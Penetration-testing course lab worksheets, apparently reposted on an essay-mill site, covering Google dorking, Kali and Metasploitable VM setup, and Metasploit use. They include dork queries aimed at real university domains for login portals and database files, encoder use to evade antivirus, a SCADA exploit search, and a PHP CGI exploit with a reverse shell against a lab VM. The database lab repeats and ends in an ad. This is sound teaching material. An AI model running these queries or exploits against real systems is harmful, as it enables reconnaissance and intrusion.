Computer Science

Google Hacking Lab

Class

Name:

Date:

This is an introduction to using search engines for penetration testing. “Google Hacking” is a valuable skill for penetration testers. Google’s automated search algorithms constantly visit every IP in the world and collect information about the services that IP provides and indexes the content the IP makes available. Google hacking could be called an art. The information gathered is only limited to your ingenuity when crafting your queries. Keep in mind, the principles behind Google hacking apply to all search engines.

In this lab you will enumerate sub-domains, identify new machines, scour web servers for files that reside on directories but have been forgotten, learn about the underlying architecture of web servers, locate logon portals, and use targeted queries to locate specific file types. When clicking on links used the cached version so you visit Google’s cache and not the website itself.

1. Open a browser and navigate to: google.com

2. We’re going to search exclusively for Wilmu domains.

2a. Type: site:wilmu.edu

3. We received too many www.wilmu.edu returns for this search to be of use. Let’s subtract some information from our query.

3a. Type: site:wilmu.edu -site:www.wilmu.edu -site:libguides.wilmu.edu

3b. What new domains did you identify?

Answer:

4. Now let’s see what systems provide directory listings. Directory listings are important because there is the potential you will be able to see the entire website’s file structure. Also, many webmasters forget to remove content they no longer make visible with hyperlinks. This content is valuable for various information gathering and exploitation reasons because it could be old pictures, databases, password files, etc. (Be sure to click on the cached links and not the actual links.)

4a. Type: site:umass.edu intitle:index.of

5. Another search we might do is for error or warning messages that give us an indication of the underlying infrastructure and application. Depending on the error or warning we will be able to determine if the web server is running Apache, IIS, SharePoint, WordPress, etc. To do this we would use the “or” operator. A query with the or operator for warnings or errors would look something like this: intitle:”apache status” “apache server status for” | “welcome to windows small business server 2003”

6. Let’s look for applications and databases we may login to. Many organizations use Federated rights, meaning once you’re logged in you may login to other systems. This is called “single sign-on” or SSO.

6a. Type: site:wilmu.edu logon | login

6b. What Portals did you find?

Answer:

7. We found some interesting portals but those are for students. Where else might a penetration tester look?

7a. Type: site:wilmu.edu faculty | staff | admin | administrator + login | logon

7b. What results did you find?

Answer:

8. We’ve been looking for interesting information about sub-domains, posted on websites, logon portals, but what about the files themselves? Are some files extensions more promising than others? Let’s find out by searching for different file extensions.

8a. Type: site:wilmu.edu ext:pdf

8b. Type: site:wilmu.edu ext:asp username

What link did you find that may be of use?

Answer:

8c. Type: ext:mdb (mdb is a Microsoft Access database extension.)

Did you find any interesting results?

Answer:

VMWare Home Lab Setup Instructions

1. Download all VMs.

1a. Download Kali VM: http://www.kali.org/downloads/

1b. Download Metasploitable 2 VM: https://information.rapid7.com/metasploitable-download.html

1c. Download VMware Player: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/6_0

1d. Be sure to unzip all files.

2. Install VMWare Player.

3. Open VMware Player.

4. Click the “Open a Virtual Machine” option.

5. Navigate to the Metasploitable VM and select this file: Metasploitable.vmx

5a. If you get a prompt asking if you moved or copied the VM select: “I copied it.”

5b. If you get a prompt asking if you want to download VMware Tools for Linux click “Download and Install”.

6. Open a second instance of VMware Player.

7. Navigate to the Kali VM and select the .vmx file.

7a. If you get a prompt asking if you moved or copied the VM select: “I copied it.”

Both your Kali VM and your Metasploitable VM should be running. Switch your focus to the Kali VM.

8. Type this username at the login prompt: root

9. Type this password: toor

We need to change the default password because it’s not secure. While the password we’re changing it to isn’t necessarily secure (for the sake of simplicity in this class) we still need to change it on principal.

10. Type: passwd

11. Type: wilmu123

12. Let’s update Kali so we have the latest updates.

12a. Type: apt-get update && apt-get upgrade

12b. Open the MSFConsole and type:

apt-get update

apt-get upgrade

apt-get dist-upgrade

Now let’s switch our focus to the Metasploitable VM.

13. At the user logon prompt type: msfadmin

This is an intentionally vulnerable system so there’s no point in changing the password from the default.

14. At the password prompt type: msfadmin

You are now ready to pen test!

Introduction to Metasploit – A Tour

Class:

Name:

Date:

What is Metasploit?

Metasploit is an open source framework for exploitation that has transcended its humble beginnings and become a “penetration testing environment suite” – my interpretation. I say this because you are now able to use Metasploit to accomplish any task in the penetration testing phase and based on your findings you may choose a tool/methodology, modify an existing tool/methodology, or create a new tool/methodology to accomplish your goal. While most penetration testing options like Canvas have additional options and features, none provide you with the freedom and flexibility that Metasploit does. So while Kali is a wonderful Linux-based operating system loaded with tools, a pentester has everything he or she needs in Metasploit. As you will soon learn in this course, Metasploit has reconnassiance tools (discovery and vulnerability scanners), malicious code generators, evasion apps so your exploit doesn’t get caught by IPS or antivirus, password attack tools, and many, many more.

1.Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Launch a shell. (It’s the black box icon to the right of Applications, Places.)

3. Type: msfconsole

3a. Wait patiently for Metasploit to load.

3b. Open another shell and type: env (View the PATH variable. When you attempt to execute a program Linux looks at all of the paths in the PATH environment variable to find and execute the program. That’s why you may type “msfconsole” and the program executes.)

4. If you visit the Rapid7 website you will find you have the option to register for notifications, support, and updates of Kali. Rapid7 has moved away from using SVN for code management to Git. For our purposes here it doesn’t matter but if you enjoy working on the bleeding edge of distros you may want to register and upgrade to the latest version.

5. Switch your focus back to the Metasploit shell. Look at the information under the banner and answer the questions below about the various modules available.

5a. How many exploits does Metasploit have:

5b. How many auxiliary exploits does Metasploit have:

5c. How many post modules does Metasploit have:

5d. How many payloads does Metasploit have:

5e. How many encoders does Metasploit have:

5f. How many nops does Metasploit have:

Metasploit Modules Breakdown

I’ve defined Metasploit’s modules below. Take the time to read them so you have a better understanding of their purpose and use.

Exploits – Pre-packaged malicious executables that takes advantage of a vulnerability to gain access to a system and deliver a payload.

Payloads – Can be a variety of applications/configurations used to establish foothold on system post-exploitation. Examples are reverse shells that call home or stagers for further exploitation and persistance. Meterpreter is a particularly useful and commonly used payload shell.

Encoders – Obfuscates exploits and payloads so they can’t be fingerprinted by AV or IDS/IPS definitions.

Auxiliary – Attack components such as DoS tools, buffer overflows, SQL injection apps, fuzzers, and more.

Post – Automation modules for post-exploitation. Tools to further establish access on a system or network like keystroke loggers and privilege escalators.

NOPs – NOP sled tools such as buffer overflow reference material for custom NOP sleds. For simplicity’s sake we’ll say NOP sleds tell a processor to do nothing for a specified number of clock cycles, thereby increasing the chances of your code executing successfully.

With that brief introduction behind us let’s learn by doing.

*You may want to maximize your shell to full screen.

6. Type: help (Notice the list of commands available to you in Metasploit.)

7. Type: show exploits (Wait patiently for the Metasploit database to be queried and print the results to your terminal.)

7a. Notice the format: Name, Date, Rank, Description

7b. What is the date of the “windows/http/sonicwall_scrutinizer_sqli” exploit?

7c. What is its rank?

7d. What is its description?

8. Encoders allow you to encode your payload so it doesn’t trigger antivirus or IDS tools like McAfee’s HBSS. This is very important to know and understand because most AV and IDS tools aren’t going to catch your payload if you encode it.

8a. Type: show encoders

8b. Find and document an encoder here:

9. Payloads are the deliveries we will make to the system we are exploiting.

9a. Type: show payloads

9b. Find and document a payload for the Mac OS here:

10. We will use auxiliary modules quite a bit. There are a variety of community provided penetration testing tools located here.

10a. Type: show auxiliary

10b. Does the auxiliary module contain scanners?

Now let’s get down to business and pretend we are professional penetration testers researching a strategy to gain access to an industrial control system network such as a water treatment plant.

11. We need to find a Windows SCADA exploit.

11a. Type every word after this colon: search windows/scada

12. Let’s learn more about a particular module we found in our search results to confirm it will be useful to us.

12a. Type: info windows/scada/moxa_mdmtool

12b. Who provided this exploit?

12c. What are the options available for this exploit?

12d. What references are available?

12e. What does the description tell us this module does?

13. This may be the exploit we need to compromise the system.

13a. Type: use windows/scada/moxa_mdmtool

13b. Type: show payloads

13c. Document two payloads you would might use that are available for this exploit:

14. Type: show advanced

14a. These advanced options, for the most part, won’t normally be changed by you. You will want to change them in some cases though. Scroll down to the SSL option. It’s currently set to false. If you were running a reverse shell out of a network you may want to enable SSL not only to potentially hide your activity but to also protect your client. The last thing you want to do expose the client’s data to a third party because you transferred it in clear text over the internet.

15. Type: show options

15a. These are the setting the exploit currently has.

16. Type: info

17. Type: help

17a. What command would you type to verify a system is vulnerable to this exploit?

17b. What command would use to execute the exploit?

18. Type: exit

Now let’s take a look at how Metasploit’s file system is organized.

19. Type: cd /usr/share/metasploit-framework/modules

19a. Type: ls (You should recognize the high level organization.)

19b. Type: cd exploits

19c. Type: ls (As you can see, you may drill down in each folder to view available tools Metasploit offers. Although this isn’t necessary, it is good to understand how the Metasploit is organized for troubleshooting modules.)

You’ve gained a basic understanding of Metasploit’s organization and how to explore this popular open source penetration testing tool suite. We’ll gain a higher level of understanding and take part in a more advanced use of Metasploit in subsequent labs.

Metasploit Msfconsole Lab

Class:

Name:

Date:

1. Open VMware and launch the Kali VM and login as root with your password

wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of

the desktop, to the right of the word “Places”.

3. Type: service postgresql start

4. Launch Metasploit by typing: msfconsole

5. Type: db_status

6. Open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

In this lab we’ll be demonstrating the use of the msfconsole. We’ll exploit a

vulnerability of the Apache web server, deliver a payload, and confirm we have

a reverse shell.

1. Switch back to Kali.

2. Type this and hit the enter key at the msf> prompt: db_nmap -p 1-1024 -sV x.x.x.x (IP address of the Metasploitable system that you recorded in Step 12.) We’ve just done a port scan on our target using

Nmap. We’ve added our results to the Nmap database in case we need to retrieve

the results for later review. We only scanned ports 1-1024 and we used the -sV

switch on open ports to determine the application and version that is running.

5. What service is running on these ports:

(The command will take a couple of minutes to run.)

Port 21:

Port 22:

Port 23:

Port 25:

Port 53:

Port 80:

Port 111:

Port 139:

Port 445:

Port 512:

Port 513:

Port 514:

All of these ports and the services/applications running on them have the

potential to be exploited but we have to determine the version of the software

running on them.

6. Take notice of the TCP port 80. Apache httpd 2.2.8 (Ubuntu) is running.

Let’s see if we can find out more information about the software running on

port 80.

7. Type: use scanner/http/http_version

8. Type: info (Make note of the RHOSTS option. We’ll use that to specify the IP

of our target.)

9. Type: set RHOSTS x.x.x.x (This is our target’s IP.)

10.Type: set RPORT 80

11. Type: exploit

12. Take notice of the results: Powered by PHP/5.2.4ubuntu5.10

13. We just learned a little bit more about our Apache server running an Ubuntu

OS. It’s running PHP 5.2.4.

14. Let’s find out what exploits exist for PHP. Maximize your VMware window and

type: clear

15. Type and wait: search php type:exploit

16. Type: use exploit/multi/http/php_cgi_arg_injection

17. Type: info

a. What version of PHP does the description say is vulnerable to this

exploit?

ANSWER:

18. Now that we believe we may have a working exploit let’s view and choose the desired payload that is compatible with this exploit. Type: show payloads

19. We’ll go with a stable and reliable reverse shell. Type: set PAYLOAD

generic/shell_reverse_tcp

20. Type: set RHOST x.x.x.x (IP of target.)

21. Type: set LHOST x.x.x.x (Your IP.)

22. Type: set LPORT 1234

23. Type: show options (This will verify your changes. Make sure the options

you have set are showing.)

24. Type: show advanced (Verify there is nothing else you want to change.)

25. Type: exploit

26. You may be asking yourself what, if anything, happened. Type: ls

a. How many files and folders were displayed.

ANSWER:

27. Type: pwd

a. Document your present working directory.

ANSWER:

28. Type: whoami

a. Document the name of the account you are logged on with.

ANSWER:

29. Type: uname –a

30. Type: cat /etc/issue

Excellent! You’ve used the MSFconsole to run a port scan and save the contents

of that scan to a database for later retrieval. You further investigated a port

of interest by running an additional scanner against it and determined more

information about the application and version information. You then searched

Metasploit’s database for applicable exploits. Once you found an appropriate

exploit you determined the payload you will use, ran it, got a reverse shell,

and verified connectivity by executing some simple commands. Congratulations!

Following these simple steps when trying to penetration test systems will aid

you in better understanding the nuances of exploiting systems.

29. Press ctrl+c. Type “y” when prompted.

30. Type: back

31. Type: exit

Metasploit Database Lab

Class:

Name:

Date:

1. If your VMs aren’t already running, open VMware and launch the Kali VM and

login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of

the desktop, to the right of the word “Places”.

3. Type: service postgresql start

3a. Type: service metasploit start

3b. Type: service metasploit stop

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches we have to connect to the Postgres database.

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

ANSWER:

6. If Metasploitable isn’t already running open another instance of VMware and

launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The

database is very useful for capturing and organizing penetration testing data

that you may want to refer to again, use for automating penetration tests,

share with others, create reports, etc. The database contains these tables:

hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Useful database commands are:

db_connect (Connects you to an existing database.)

db_disconnect (Disconnects you from a database.)

db_driver (Allows you to specify the type of database you will be connecting

to: MySQL, SQLite, PostgreSQL, etc.)

db_status (Tells you the type of database you’re connected to.)

db_export (Allows you export the contents of the database to XML.)

1. We know we are connected to the database so now let’s populate it with

target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmap x.x.x.x (IP of your target.)

3. You’ve just added the contents of your nmap scan to the database. Let’s

view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

ANSWER:

5. Type: services

a. What information is provided in this table?

ANSWER:

6. We would normally also type “notes” or “loot” or “vulns” but we haven’t

populated the database with any of that information. FYI, the vulns information

may be imported from .nessus files. If you’re not familiar with Nessus Google

it for quick reference. These tables will populate as you exploit systems.

Interact with a database when performing reconnaissance or running a

vulnerability scan may not seem immensely helpful in a lab setting because

we’re only scanning 1 system but what if we were scanning 10 systems or 100

systems or 1000 systems or 10000 systems or even more? It is simply not

feasible for a pen tester to scroll through the results and manually document

interesting findings. That’s where the beauty of logging our penetration

testing results to databases really pays off. Being able to instantly reference

all of the hosts we’ve scanned for a project or reviewing all of the possible

vulnerabilities in systems we’ll be exploiting is a professional approach to

handling the mountains of data that may be generated during a customer

engagement.

Metasploit Database Lab

Class:

Name:

Date:

1. If your VMs aren’t already running, open VMware and launch the Kali VM and

login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of

the desktop, to the right of the word “Places”.

3. Type: service postgresql start

3a. Type: service metasploit start

3b. Type: service metasploit stop

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches we have to connect to the Postgres database.

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

ANSWER:

6. If Metasploitable isn’t already running open another instance of VMware and

launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The

database is very useful for capturing and organizing penetration testing data

that you may want to refer to again, use for automating penetration tests,

share with others, create reports, etc. The database contains these tables:

hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Order now and get 10% discount on all orders above $50 now!!The professional are ready and willing handle your assignment.

ORDER NOW »»